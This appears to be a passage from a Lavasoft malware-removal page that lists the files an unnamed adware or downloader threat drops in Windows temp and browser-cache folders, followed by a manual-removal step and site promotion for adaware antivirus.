    %Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe (15 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Readme.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\AE3B6594.dat (16424 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.ico (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Readme.txt (2 bytes)
    %Documents and Settings%\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe (163934 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\x64\regsvr32.exe (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\down.1936.usetup.exe (25824 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_tin9E1A.bat (88 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\down.1936.putfu.exe (163934 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1_1.ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\efd952ab4bdc43976f26649917fafe30.log (1671022 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\down.1936.1.ini (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\1_1[1].txt (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now